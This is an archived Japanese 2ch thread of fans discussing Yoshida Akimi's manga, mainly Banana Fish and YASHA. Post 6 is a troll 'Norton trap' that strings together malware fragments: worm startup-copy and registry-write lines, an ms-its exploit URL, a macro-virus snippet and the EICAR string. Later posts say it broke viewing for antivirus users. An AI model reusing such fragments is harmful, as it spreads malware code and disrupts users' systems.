5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

吉田秋生 13

1 :花と名無しさん:2006/11/10(金) 22:46:28 ID:???0
「イヴの眠り」完結(全5巻)、「YASHA」文庫版(全6巻)発売中。
前スレ
吉田秋生 12
http://comic6.2ch.net/test/read.cgi/gcomic/1142777027/


2 :花と名無しさん:2006/11/10(金) 22:47:15 ID:???0
関連スレッド一覧

*******Flowers(フラワーズ)15******** (少女漫画板)
http://comic6.2ch.net/test/read.cgi/gcomic/1148738463/

【アッシュ】BANANA FISH 2スレ目【英二】(懐かし板)(DAT落ち)
http://comic6.2ch.net/test/read.cgi/rcomic/1115561995

櫻の園〜中原俊作品(懐かし邦画板)
http://that4.2ch.net/test/read.cgi/rmovie/1069466877/

■■■ YASHA (夜叉) ■■■ (懐かしドラマ板)
http://bubble4.2ch.net/test/read.cgi/natsudora/1054309704

3 :花と名無しさん:2006/11/10(金) 22:49:13 ID:???0
とりあえず、ここまで。テンプレの不備など、気づかれた方、修正・追加ヨロ。

4 :花と名無しさん:2006/11/10(金) 23:15:28 ID:pIoEoPc20
なンでエレクチオンしないのォォーッ!!!!!!!

5 :花と名無しさん:2006/11/10(金) 23:20:48 ID:???0
>1乙

新連載(続き物の読み切り?)についても書いた方がいいのかなとおもったけど
フラワーズ手元にないので正式なタイトルわからん。

6 :<body onload=window()>:2006/11/10(金) 23:41:31 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/11/11(土) 02:10:31 ID:???0
>>1
乙。

>>5
シリーズのタイトルは「海街diary」みたい。
今初めて知った。

8 :花と名無しさん:2006/11/11(土) 10:50:33 ID:???0
乙です。


9 :花と名無しさん:2006/11/12(日) 14:53:27 ID:???0
月龍がゴルツィネに、「アッシュを捕まえて差し上げます」と言い
実際にそうしていたけれど、わざわざ月龍の力を借りなくとも
捕まえることは可能だったんじゃないの?

無下にすることもできないから、恩を受ける振りをしてやらせてみたってこと?

10 :花と名無しさん:2006/11/12(日) 15:06:41 ID:???0
アッシュはやっぱかっこいいな

11 :花と名無しさん:2006/11/13(月) 01:53:54 ID:???0
花達出たのにまるで話題に出てなくてワロス

あれはラヴァーズキスの前の話ということなんだろうか

12 :花と名無しさん:2006/11/13(月) 08:38:48 ID:???0
>>9
あれは、ショーターに圧力かけられる月龍の力無しには出来なかった事でしょ。
ゴルツィネには捕まえられなかったとは言い切れないが、ショーターを獅子身中の虫
として使えた月龍の方が、はるかに効率が良かったのは確かだろうと。
>>11
>>あれはラヴァーズキスの前の話ということなんだろうか
海街diary読んでないんで断言は出来ないけど、前スレではそうだというレスがあった。

13 :花と名無しさん:2006/11/13(月) 13:53:22 ID:???0
>>12
ありがとう。
でも自分が知りたかったのは、それよりずっと後の
アッシュがロボを脅して原稿を奪ったり
ドースンを療養所から誘拐したりといったあたりの話です。

14 :花と名無しさん:2006/11/13(月) 14:08:35 ID:???0
ゴルツィネ的に、綺麗な子が綺麗な子を追っかける
シチュエーションに萌え〜ってやつだったんじゃないの。

15 :花と名無しさん:2006/11/13(月) 15:36:42 ID:???0
>>13
なるほど、そっちか。たぶん、英二がアッシュのアキレス腱だというのを、
月龍の方がゴルツィネよりずっと正確に認識してたからじゃないかと。
英二みたいな心を許せる存在を、月龍も実は欲してた訳で。そのへんの
気持ちは、ゴルツィネには理解できんだろうし。


16 :花と名無しさん:2006/11/13(月) 16:06:45 ID:???0
>>14>>15
なるほどね。
ブランカの方がプロだし確実だろうけど、ごつくてちょっとアレだしなw
若様に任せて成功すればもちろんゴルツィネにとって得だし、
失敗しても実害はないしね。

結局シンが英二のような存在になってあげたのかな。

17 :花と名無しさん:2006/11/13(月) 16:45:03 ID:???0
>>16
>>結局シンが英二のような存在になってあげたのかな。
多分。ラスト一話前の、お子ちゃまな口げんかなんか、まさにやりたくて
しょうがなかった事って感じだし。「光の庭」での、電話での皮肉まじりの
会話も、より落ち着いた友人同士のやりとりで、また違った味があった。

18 :花と名無しさん:2006/11/13(月) 17:36:57 ID:???0
>>17
光の庭でのシンと若様の会話は友人同士って感じじゃなかった。自分には。
若様は仲良くしたげだったけど、シンは何か若様と一線引きたいっぽくなかった?
何かシンは若様と仕事以外で口ききたくなさげに感じたよ。

19 :花と名無しさん:2006/11/13(月) 18:32:19 ID:???0
>>18
そのへんの受け取り方は人それぞれだけど、自分には気の置けない友人同士の
会話だと感じられた。二度も電話を切りたがった(二回目は本当に切った)
のは、アッシュがらみの痛い所をつかれた時だし。アッシュの話で「楽しそう」
「饒舌になる」のは、シン自身が思い出に浸っちゃってるから。月龍の
「思い出と戦っても勝ち目はないよ」は、月龍が自分自身にも言い聞かせてる
という感じ。

20 :花と名無しさん:2006/11/13(月) 23:24:04 ID:???0
友人とは思えなかった。
気の置けないというより、遠慮したり気を使ったりで
優しくするつもりはないって感じに見えた。
相手の力を承知してはいるけど
背中を預けるような暑苦しい信頼感はなくて
あくまで盟約・ちょっと殺伐みたいな。

21 :花と名無しさん:2006/11/13(月) 23:58:57 ID:???0
何か、あの頃のシンは若様より英二に重点おいてたよね
でも若様がお亡くなりの時はむちゃくちゃ怒ったというし・・。

22 :花と名無しさん:2006/11/14(火) 16:25:39 ID:???0
若様亡くなったの?

23 :花と名無しさん:2006/11/14(火) 17:14:36 ID:???0
>>22
残念だけどお亡くなりになりました。
ブランカが遺体をひきとって灰をカリブに持ち帰ったんだよ。

24 :花と名無しさん:2006/11/14(火) 17:22:22 ID:???0
何故ブランカが?

25 :花と名無しさん:2006/11/14(火) 20:51:15 ID:???0
BANANAFISHの番外編読んでないの?
ブランカが主人公のシリーズ2巻まで出てるよ

26 :花と名無しさん:2006/11/14(火) 21:06:19 ID:???0
ラジオドラマでゴルツィネの声を演じた人は、
「ピタゴラスイッチ」のひゃっかおじさんと同じ人なんだと…orz

アッシュは24のパーマー大統領弟
英二はアンのギルバート、エースをねらえの藤堂、美味しんぼの山岡

ラジオを聞いた方、どんなだったかぜひ教えて。

27 :花と名無しさん:2006/11/14(火) 21:15:37 ID:???0
>>25
自分が知っているのはANOTHER STORYだけなんだけど、
他にもあるの? ぜひ読みたいので題名教えて!

28 :えみくり:2006/11/15(水) 00:04:59 ID:???0
ラジオはアッシュが何か軽い男だった。
特に最初英二に銃を渡すシーン。でも他はまああんなもんかな。

29 :花と名無しさん:2006/11/15(水) 06:09:42 ID:???0
>>27
吉田秋生じゃなくて他の誰かがかいた二次小説みたいなのは
見たことある。なんか二次っていうのが気持ち悪くて読んでない。

30 :花と名無しさん:2006/11/15(水) 10:36:41 ID:???0
>>23
若様が亡くなった経緯と、なぜブランカが遺体を…
…知りたい。

31 :花と名無しさん:2006/11/15(水) 14:18:35 ID:???0
絶対零度の天使となったアッシュが、シンと英二の暮らすアパートに降臨。
シンを殺そうとする。そこに若様がシンを庇ってアッシュの銃弾に倒れ、
英二は記憶をなくしてしまう。シンの連絡を受け、カリブから戻ったブランカが
涙の戦士となりアッシュと死闘をくりひろげるけど最後は英二の幸せを願い成仏。
ブランカとシンは2人で若様の遺体を焼いて密葬。
ブランカが遺灰をもらいうけ、カリブに戻る。そして、アッシュと同じくらい
自由を欲していた若様の心中を思い、灰をカリブの海にまく。
「ブランカ回想録・静かな日々」に収録されてます。感動しますよ。

32 :花と名無しさん:2006/11/15(水) 14:28:11 ID:???0
クスッ

33 :花と名無しさん:2006/11/15(水) 14:55:45 ID:???0
全米が笑った

34 :花と名無しさん:2006/11/15(水) 17:17:13 ID:???O
前からさくらの唄気になってて
最近でた新装版ではじめて読めたんだけど、
後半で仲村さんが偏差値低い高校に通っている謎(?)は明かされます?

35 :花と名無しさん:2006/11/15(水) 17:44:12 ID:???0
そろそろ>30がかわいそうだw
でも、若様が崩御されたのは本当です。

36 :花と名無しさん:2006/11/15(水) 21:37:41 ID:???0
アッシュのおでこが結構広がっていったよね
ハゲるんじゃ・・と心配する必要もなく死んだけど。

37 :花と名無しさん:2006/11/15(水) 23:29:39 ID:???O
アッシュは禿げるタイプだよね

38 :花と名無しさん:2006/11/16(木) 00:26:23 ID:???0
アッシュアッシュアッシュ
白人は香水を好んでつけるけど、彼もつけてたんでしょうか?

39 :花と名無しさん:2006/11/16(木) 14:12:22 ID:???0
アッシュ禿げ・・・死んでくれてよかった。
アッシュの親父は髪の毛フサフサだったのにね。
そういえば、あのお父さんもIQ高いのかな、75〜80%は遺伝で決まるってことは
母親だけが優れてたんじゃないよね。あのお父さんもハンサムで頭よかったのかな?

40 :花と名無しさん:2006/11/16(木) 15:03:44 ID:???0
口が悪いのって似るの?

41 :花と名無しさん:2006/11/16(木) 15:08:55 ID:???0
>>39
母親がハンパにIQ高め(150くらい)な社会不適合者なのかと勝手に想像してた。

42 :花と名無しさん:2006/11/16(木) 18:21:02 ID:???0
IQ150はハンパでなく相当高いと思うんだが。
んで、何で社会不適合なの?

43 :花と名無しさん:2006/11/16(木) 18:56:32 ID:???0
モテ男ジェームズ

44 :花と名無しさん:2006/11/16(木) 19:02:17 ID:???0
アッシュのお父さん若いよね

45 :花と名無しさん:2006/11/16(木) 19:19:25 ID:???0
【アメイジンググレース訳詩 】

驚くべき恵みよ!(なんと甘い響き)
神は私のような罪深き者も救われた
私は見失われたが今見いだされたのだ
私は何も見えていなかったが今は見える

私の心に畏れることを教えたのも恵み
そして私の心を畏れから解放したのも恵み
なんと恵みは貴くも現れたのか
私が初めてそれを信じた時に

多くの危険と苦悩と罠を越えて
私はやってきた
その間私が無事だったのも恵みのお陰
そして恵みが私を天国へ導いてくれる

主は私に良きことを約束された
主の言葉は私の望みを保証する
主は私の盾となり私の一部となる
命のながらえる限り

そうこの肉体と心が朽ちて
限りある命が終わるとき
私は帳の中に隠されている
喜びと平和の命を得るだろう

いつかは地球も雪のように消えるだろう
太陽も輝きを失うだろう
しかし私に呼びかけてくれた神は
常に私とともにあるだろう

46 :41:2006/11/16(木) 20:33:11 ID:???0
>>42
180だの200だの「うおー天才!」っつーほどでもない、
高いけどそこそこありそうな数字としてあげてみただけ>150
あと、社会不適合者ってか、地道な暮らしが
出来なかった人なのかなと。

47 :花と名無しさん:2006/11/17(金) 00:26:28 ID:???0
愛に生きた人っぽいよね。
熱しやすく冷めやすいんか、子供おいてけぼりっつーから男に走る女。
でも美人だったんだろね。

>>45
恵み、あるいは神をエイナエイコ英二に置き換えるんかい?

48 :花と名無しさん:2006/11/17(金) 07:12:22 ID:???0
>>46
本人も同業である作家ジョナサン・ケラーマンの児童心理分析医アレックス・シリーズ
「グラス・キャニオン」に、
IQ200の子供なんていうのは一種のモンスターで、
本人と親の必死の努力(周囲の人間と意思の疎通をする段階からそもそも躓くらしいので)
なくしては非行どころか、鬱症状から廃人のようになってしまう、自殺の可能性もはんぱじゃない
という意味の描写があった。
IQが高いというのは「いわゆる頭の切れる天才」ではすまないらしいと、その本を読んで思った。



49 :花と名無しさん:2006/11/17(金) 10:20:16 ID:???0
そうだろうね。
周囲が自分のレベルに追いつかないから、意思の疎通もままならないだろうし。
自分が普通に説明したことを何で理解できないんだと。

大人になれば、周囲は自分ほど頭が切れるわけではないと理解できるだろうけど、
子供ならわざとわからない振りをされている、拒否されていると思っちゃう可能性も。

50 :花と名無しさん:2006/11/17(金) 15:17:23 ID:???0
何かで、IQ400とかの設定のヤツが出てきてる(漫画家小説か知らんが)のを
見かけた覚えがあるが、ムチャクチャな設定だね。
○千秋の漫画でIQ300とかの男もいたけど。
アルジャーノンも知能がどんどん高くなって、周りの人間と理解しあえなくなってったけど
そんなんでも、誰かを愛したりとかできるのかな。
アッシュがそんなにIQ高いなら余計英二なんかを大切に思ってたのがわからない。


51 :花と名無しさん:2006/11/17(金) 15:38:26 ID:???0
>>50
ルチ将軍なんてIQ1300だったよw

英二に対する感情については、自分にはないお優しいところと
それが育まれた環境に憧れたんじゃないの。

52 :花と名無しさん:2006/11/17(金) 17:13:37 ID:???0
1300.ってどんなんだ?

53 :花と名無しさん:2006/11/17(金) 19:58:56 ID:???0
関係ないけどさー、BANANA読んで自分はアッシュって超ハンサムな男ってイメージだったんだけど、
ヤツがナース服着て医者にナンパされるとこ見てすごい疑問を感じたんだけど。
アッシュはナース服着てるだけで特別化粧とかもしてないじゃん。
なのに医者に美人看護婦と思われてるなんておかしくない?
男がナース服着てるだけでしょ。おかしくない?女っぽい美形なの?
月龍と同系統の美形って萎え萎えなんですが。

54 :花と名無しさん:2006/11/17(金) 20:33:16 ID:???0
>>53
あの頃ってリバー・フェニックスを意識して描いていたんだろうけど
リバー似ならどう見たって女の子じゃないよねえ

55 :花と名無しさん:2006/11/17(金) 21:47:52 ID:???0
1巻のアッシュがナース服きてるだけだったらさ、完璧女装した男だね。
絵は変わったけど、作品中アッシュは1人しかいないんだから
1巻の頃のアッシュがナース服きてるのと同じだと解釈してもいいよね?
誰もナンパしねーよ、ムキムキナース男ww

56 :花と名無しさん:2006/11/17(金) 22:27:40 ID:???0
河よりも〜のトシのセーラー服姿みたいな感じかもね。
んでも向こうのゴツい人からすればトシでも華奢なんだろうか…

57 :花と名無しさん:2006/11/18(土) 04:55:19 ID:???0
違うぞ、逆に考えるんだ。

ムキムキ筋肉で胸板厚くトップバストは低く、腰はでかくてヒップ小さく、
指はすじばってふくらはぎはシシャモのように張っていて、
金色のうぶげが ま る で ヒゲのように鼻の下に光ってる男顔の

ごッつい大女が好みのタイプだから、彼はあの時アッシュをナンパしたんだ。

58 :花と名無しさん:2006/11/19(日) 01:33:34 ID:???0
ナルホド!!

59 :花と名無しさん:2006/11/19(日) 17:34:21 ID:???0
ちがうでしょ、あの医者がホモでゴツいニューハーフが好きだっただけw
だからアッシュはただ運が良かっただけ。

60 :花と名無しさん:2006/11/19(日) 18:04:30 ID:???0
スレ全体が見られないんだけど私だけかな…

61 :花と名無しさん:2006/11/19(日) 18:19:57 ID:???0
>>60
意味がわからん。
最新50しか見えないってこと?

62 :花と名無しさん:2006/11/19(日) 18:32:46 ID:???0
>>60
原因はこのスレの頭の方(レス番5以下あたり?)にある
ノートントラップのせいだと思う。
カキコも出来ないでしょ?

63 :花と名無しさん:2006/11/20(月) 00:30:16 ID:???0
>>60です
専用ブラウザ=スレを開くとノートン反応&まっしろ(ログ取得はできてるのに何にも表示されない)
IE=人多杉
60を書き込んでみたら、60「だけ」表示されました

素で「なんでエレク(ry」と呟いてしまった
ノートンの設定をいじって今ようやく見られました…お騒がせしますたorz

64 :花と名無しさん:2006/11/20(月) 01:21:04 ID:???0
サッフォーの末裔(プッ

65 :花と名無しさん:2006/11/20(月) 01:51:07 ID:???0
戸田誠二?

66 :花と名無しさん:2006/11/22(水) 10:44:42 ID:dpxCHKar0
三姉妹の奴、なんで三女がアフロなんだ?
前回に説明あったっけ?

67 :花と名無しさん:2006/11/22(水) 11:36:14 ID:???0
>>66
なかったけど今回で「こいつの影響か」と思わせるアフロ男が出てきた。

68 :花と名無しさん:2006/11/22(水) 11:58:29 ID:???0
>>57
そういう女実際いるんだよなー白人で。スポーツやってたりすると珍しくない…

69 :花と名無しさん:2006/11/22(水) 20:02:03 ID:???0
BANANA FISHを最近読み返しているんだが。
6巻(FCコミックスのほうね)の途中でいきなり
アッシュの顔が変わるんだということに初めて気づいた。
それまではまだ少年って感じの頬の丸みだったのが
突然「今から美形で行きまーす!」って感じだ。
そのタイミングで(ここでBLだと言われるような)くさい台詞が
増えてるんだねー。

70 :花と名無しさん:2006/11/22(水) 22:39:19 ID:???0
インパクト的には髪の毛セットして出てきたあたりからおかしくなったような気がするけど
実際のところはもうちょっと前くらいから変わってるよね

71 :花と名無しさん:2006/11/22(水) 23:10:44 ID:???0
いやはや、全部秋生がミーハーなせいです、すいませんねぇ。

72 :花と名無しさん:2006/11/22(水) 23:36:31 ID:???0
最初のハードボイルドっぽいアッシュでよかったのにな。
英二にも「足手まとい」ってはっきり言ってるけど、納得できる展開だし。
ただ、その後心にもないこといって自棄酒かっくらってる意味がわからんが。
その時点で別に特別友情とかめばえてないのに・・・。

73 :花と名無しさん:2006/11/22(水) 23:57:12 ID:???0
アッシュも英二も最後まで1巻的な容姿で、
アッシュがあそこまで天才美形だ娼婦だ小悪魔だとキモマンセーされず、
英二があそこまでお姫さまでなく、

巨大組織も、ちんけな悪党も、ベトナム戦争で心の傷を負った元兵隊も、そこらへんの失恋した女とかも
世界を手に入れたりライバルを殺したり人生をやり直したりしたいと思ってて、
だから誰も彼もが最後まで(アッシュの過去の傷ではなく)バナナフィッシュの謎を追い
(アッシュではなく)バナナフィッシュの争奪戦で血で血を洗う抗争に明け暮れ、

その中でふと英二の素朴な親愛に触れてアッシュがちょっと息をつき、そのなんでもない思い出を抱いて
あのオチへ…っていうのを描いてくれたら、もう少女漫画じゃないけど、
「少女の胸をも熱くさせる本格ハードボイルド」として素晴しいものになったんじゃないかと思う。
BL好きにも妄想の余地がありまくっていいと思うんだけどなあ。

バナナの前半大好きであまりBL耐性のない読者のひとりごとです…

74 :花と名無しさん:2006/11/23(木) 01:13:28 ID:???0
それはホントにそうですね

75 :花と名無しさん:2006/11/23(木) 01:16:53 ID:???0
といって、私自身、アッシュにはやられた一人なんですが。
美形でIQが高く、知性と教養にあふれた美形。それだけでなく腕っ節も強く
心の中では孤独を抱え、自分の犯した犯罪に恥じ入る心ももっている。
10代でかなり大人っぽい思考で、素敵なキャラとは思いました。

76 :花と名無しさん:2006/11/23(木) 02:07:37 ID:???0
アッシュのスペック、中学生がノートに書き溜めてるキャラ設定みたいと思ってた

77 :花と名無しさん:2006/11/23(木) 05:54:39 ID:???0
ショーターすらも「中学生がノートに書き溜めてるキャラ設定」に見えてた
マックス・ロボとその奥さんのカポーが最萌えでした

78 :花と名無しさん:2006/11/23(木) 17:17:30 ID:???0
マックスかっこいい
33才だっけ?かなりいい男だ

79 :花と名無しさん:2006/11/23(木) 18:16:39 ID:???0
バナナは前半(801マンガになっていない頃)が良かっただけに、
中盤以降は違和感ありまくりで残念だった。

80 :花と名無しさん:2006/11/23(木) 18:52:26 ID:???0
ん・・・。その当時一時期801っぽい友情がうけても、
何年もたって読み直すと違和感あってしっくりこないんだよね。
何年たってもべるばらとか名作のままなんだけど・・。

81 :花と名無しさん:2006/11/23(木) 19:56:17 ID:???0
リアルタイムでフラワーで読んでたけど、
コミックスで言うとやっぱり6巻の半ばくらいから、??と思うようになったな。
今になって読み返すと、前半と後半で全く別な作品のようだ

82 :花と名無しさん:2006/11/23(木) 20:31:31 ID:???0
夜叉を初めてよんだときは面白かったって思ったけど、すぐ飽きた

83 :花と名無しさん:2006/11/23(木) 21:08:24 ID:???0
>>81
フラワーじゃなくて別コミでそ

84 :花と名無しさん:2006/11/24(金) 10:05:09 ID:Gl3IvlEg0
>>67
亀ですがd


85 :花と名無しさん:2006/11/24(金) 12:24:16 ID:???0
アッシュがいい顔だなあと思う場面
・ゴルツィネ邸でシンから勝負を挑まれるも軽く一蹴
・真っ暗な博物館の中でナイフをくわえて振り返る

86 :花と名無しさん:2006/11/24(金) 12:41:00 ID:???0
いきいきしてるのかしら

87 :花と名無しさん:2006/11/24(金) 12:47:58 ID:???0
st.キッズ「24時間後に結婚しようって言えば良かったのに」
マックス「死亡フラグ立てるつもりはねぇよ」

88 :花と名無しさん:2006/11/24(金) 13:30:18 ID:???0
絶対結婚なんかするもんか  アッス

89 :花と名無しさん:2006/11/26(日) 14:54:14 ID:???0
女関係ではだらしがないとこもあったけど、奥さんは少なくとも3人ともいなくなり
実の子は2人とも家庭をもつまでもなく死んでしまい、とうとう1人ぼっちになった
アッシュのお父さんがカワイソウ・・・。

90 :花と名無しさん:2006/11/26(日) 17:47:07 ID:???O
大丈夫
本人もあの後、死んでる

91 :花と名無しさん:2006/11/26(日) 20:28:16 ID:3H7+dAiz0
アッシュも歳くったらああいう汚いじじぃになるんだなw

92 :花と名無しさん:2006/11/26(日) 23:39:32 ID:???0
☆嵐のリーダー・大野智を応援しよう☆

ttp://www.youtube.com/watch?v=iVoyMQcdLy8
ttp://www.youtube.com/watch?v=brqlLHQNeJs
レベルの高いダンスの実力

ttp://www.youtube.com/watch?v=wIkOu0tnCQ4
ttp://www.youtube.com/watch?v=a-49XJT1li0
ナイスな天然ボケ具合

これほど非凡な才能を持ちながらイマイチ名の知れていない大野智。
動画はほんの一部です。まだまだたくさんの大野の面白動画があります。
動画を観て彼を気に入ったらどんどん彼の素晴らしさを普及しよう。
2chの力で大野をメジャーなアイドルへ!

嵐の大野智を応援してあげようぜ
http://ex17.2ch.net/test/read.cgi/news4vip/1164456153/


93 :花と名無しさん:2006/11/28(火) 19:49:18 ID:???0
アッシュが最初に死んだ時テレビニュースで放送されてたのを
親父は見たんだろうか。母親もどっかで生きてるんだしょ。

94 :花と名無しさん:2006/11/28(火) 22:20:55 ID:???0
母親は自分の息子が「アッシュ」と言われていることを知らんだろ。
本名じゃないんだから。
そもそも全国ネットで流されるネタでもないだろうし、父親も知らんと思う。

95 :花と名無しさん:2006/11/29(水) 14:06:44 ID:???0
え、でもさ、アッシュ・リンクスってのは通称だけど、アスランのニックネームが
アッシュでしょ。母親ならさー自分にも似てるだろうしわかるんじゃないの?
それにアメリカはニュース番組は全米共通じゃなかった?
ニューヨークで有名な殺人鬼ってんなら他の州でも充分ニュースだと思うんだけど。

96 :花と名無しさん:2006/11/29(水) 14:18:05 ID:???0
テレビのニュースをチェックする生活をしてるかどうか

97 :花と名無しさん:2006/11/29(水) 17:42:59 ID:???0
どんな人間でもニュースくらい見るでしょ

98 :花と名無しさん:2006/11/29(水) 17:49:11 ID:???0
>>97
いやー、アッシュパパみたいなタイプは
路上の新聞スタンド(しかも1面で見出しのでかい記事)とか
安酒場でテレビかラジオ(お色気バラエティや野球中継のない時)とかで
たまたま接するんでもない限り、リアルタイムのニュースに興味示さないと思う

99 :花と名無しさん:2006/11/29(水) 18:10:08 ID:???0
たしかにそんな感じ。
でもアッシュのことを根っこでは愛してそうだから、
もうアッシュが命を狙われているって知ってるし、その後のアッシュの動向を気にしてニュースをさり気なくチェックして
いたかもしれない。

100 :花と名無しさん:2006/11/29(水) 19:32:41 ID:???0
アッシュのお父さんにあやまれ!!

101 :花と名無しさん:2006/11/29(水) 20:06:59 ID:???0
オーサーがアッシュを憎む理由って何?

102 :花と名無しさん:2006/11/29(水) 21:52:54 ID:???0
よくありがちな、嫉妬と劣等感ってあたり?
なんでもできてよかったなーできない奴らが死ぬほど欲しがってるものを
平気で無視して放り投げて気持ちいいかよー見てるだけでむかつくぜーみたいな。

103 :花と名無しさん:2006/11/29(水) 22:47:17 ID:???0
>>95
ビルとウィリアムのようなほぼ決まった対応関係のあるのと違って、
アッシュとアスランは別に対応してないよ。

104 :花と名無しさん:2006/11/29(水) 23:21:02 ID:???0
じゃあ何で親父はアッシュって呼んでたんだ?

105 :花と名無しさん:2006/11/29(水) 23:23:17 ID:???0
オーサーは単に自分がボスとして皆から一目おかれ、尊敬されたかったんでしょ。
なのに、すんげー完璧なボスが目の前にいて、皆自分に全然注目してくれないウガアアア
ってなっただけだと思う。

106 :花と名無しさん:2006/11/30(木) 18:14:16 ID:???0
愛してるからに決まってんだろ。
少女マンガにそれ以外の理由があるもんか。

107 :花と名無しさん:2006/11/30(木) 19:01:39 ID:???0
原作の最初の方に、英二と伊部さんの
関係を指して、アマデウスシンドロームってセリフ出てくるジャン。
オーサーのアッシュに対する気持ちももろそれでしょ。

108 :花と名無しさん:2006/12/01(金) 02:12:51 ID:???0
オーサーはアッシュになりたかったんだよ。
理想とする存在だからこそ、自分がそれには絶対なれないと
分かっているからこそ、
その存在が許せないほど憎い。

109 :花と名無しさん:2006/12/01(金) 08:59:43 ID:???0
オーサーは美少年になってゴルツィネに抱かれたかったんだよ。

110 :花と名無しさん:2006/12/01(金) 15:37:48 ID:???0
違う
ユエルンとしゃぶりあいがしたかったんだよ

111 :花と名無しさん:2006/12/01(金) 17:11:01 ID:???0
オーサーはマービンとやりたかったんだよ

112 :花と名無しさん:2006/12/01(金) 19:03:30 ID:???0
マービンは超小さくて被ってて臭くて早いからアッシュに嫌われた。

113 :店子・アッシュ:2006/12/04(月) 17:37:04 ID:wKSahfDh0
小さくてもせめてムケてればね〜〜〜。辛抱ならないのよ、あのニオイ。
早いってのもサイアクぅ〜〜。

114 :花と名無しさん:2006/12/05(火) 00:27:42 ID:IXMzdHyMO
>48昔、英才児教育、とかいう本で、高い知能を持つ子供の困難について読んだよ。
体は四歳なのに知能は大学生レベル、四歳児とは話が合わず、大学生の中でも肉体が違うから仲間になれず、ギャップが激しすぎて思春期にはドロップアウト、廃人になりかねないってさ。
孤独だもん 壮絶に孤独。
IQ200ねぇ…。

115 :花と名無しさん:2006/12/05(火) 13:23:15 ID:???0
アッシュがゴルツィネのもとにずっといたら、
箔付けのために高卒資格を取らせて大学や院へ行かされたりしたのかな…

116 :花と名無しさん:2006/12/05(火) 23:23:47 ID:???0
yasha読んだ
ラストなんかあっさりした感じだな
静と十市よりアッシュと英二のが絆深い感じだからかな

117 :花と名無しさん:2006/12/06(水) 00:06:16 ID:???0
夜叉のラストの方がバナナのラストより好き。
夜叉のラスト2巻くらいの凛には泣けた


118 :花と名無しさん:2006/12/06(水) 12:47:20 ID:???0
凛よかったね。ロンゲ似合ってなかったけど。
凛の葛藤は充分ドラマだから、凛画主人公でもよかったのにな。


119 :花と名無しさん:2006/12/06(水) 12:53:48 ID:???0
ラストに近くなるに連れて、ストーリーが静より凛の内面に重点が置かれていった気がす。
凛の孤独は壮絶だった。
終盤が良かったからこそ、前半や最初の設定をもっと深みのあるものにして
欲しかった。
完成度でいうとバナナよりYASHAの方が上だと思。

120 :花と名無しさん:2006/12/06(水) 14:41:02 ID:???O
雨宮協一郎が安っぽすぎ
悪役としてはパパ・ディノのほうがチャーミング

121 :花と名無しさん:2006/12/06(水) 16:56:28 ID:???0
確かにね・・・>120

122 :花と名無しさん:2006/12/06(水) 17:25:20 ID:???0
バナナ末期にあんな感じの間抜けた軍人だかCIAだかが
いなかったっけ。安さが似てる。

123 :花と名無しさん:2006/12/06(水) 17:41:01 ID:???0
狐大佐ですね

124 :花と名無しさん:2006/12/06(水) 17:51:25 ID:???0
凛のトラウマもいかにも「とって付けました」風味だしね。

125 :花と名無しさん:2006/12/07(木) 00:04:58 ID:???O
夜叉の登場人物ではタケルが一番好き
あとケンかな
もいっちゃんはキモ

126 :花と名無しさん:2006/12/08(金) 01:42:38 ID:rZhRINE00
どちらかというと十市のほうが嫌かな。どちらかというとね…


127 :花と名無しさん:2006/12/08(金) 14:14:38 ID:???O
夜叉は悪役チャチすぎ
それ考えるとバナナのゴルツィネは 重要なキャラだったんだな

128 :花と名無しさん:2006/12/08(金) 15:28:21 ID:???0
茂市も十市も好き嫌い感じるほど出てこなかったというか、印象薄い。

129 :花と名無しさん:2006/12/08(金) 16:45:41 ID:???0
所詮十市は劣化英二だし

130 :花と名無しさん:2006/12/08(金) 19:15:17 ID:???0
それを言ったらYASHA自体が劣化バナ…

131 :花と名無しさん:2006/12/09(土) 00:00:50 ID:???0
イブで何の前ぶれもなくいきなり医者になっていたのは
あんまりだと思った。

132 :花と名無しさん:2006/12/09(土) 00:16:14 ID:???0


133 :花と名無しさん:2006/12/10(日) 06:50:32 ID:???0
バナナが劣化YASHAだろどー考えても。

134 :花と名無しさん:2006/12/10(日) 11:51:30 ID:???0
新しい作品が古いやつを凌いでいる場合は
古いものを指して「劣化」とは言わないだろう

135 :花と名無しさん:2006/12/10(日) 12:01:49 ID:???0
劣化の対義語ってなんだっけ

136 :花と名無しさん:2006/12/10(日) 12:52:06 ID:???0
進化じゃないの

137 :花と名無しさん:2006/12/10(日) 17:19:59 ID:???O
名前は聞いてたから全巻まとめて読んだけどラストで




(゚Д゚)




ええええええ

138 :花と名無しさん:2006/12/10(日) 17:36:19 ID:???0
全巻まとめてって、バナナからイブまで?

139 :花と名無しさん:2006/12/10(日) 18:27:32 ID:???0
ああ、ごめんバナナの19巻までです
てっきり日本に行って一緒に暮らすんだと思ってたから・・・

140 :花と名無しさん:2006/12/10(日) 21:16:14 ID:???0
うーん。
日本に行ってハッピーエンドは考えたことなかったなあ。
途中まで、英二はいつ死ぬんだろうとは思ってたけど。

141 :花と名無しさん:2006/12/11(月) 02:53:52 ID:???0
てか私、文庫で初めて読んだんだけど、
1巻の最後の解説文みたいなところに
アッシュが死ぬとかショーターの最後
とか書かれてあって、だいたい想像できちゃって、
すごく萎えたんですけど。

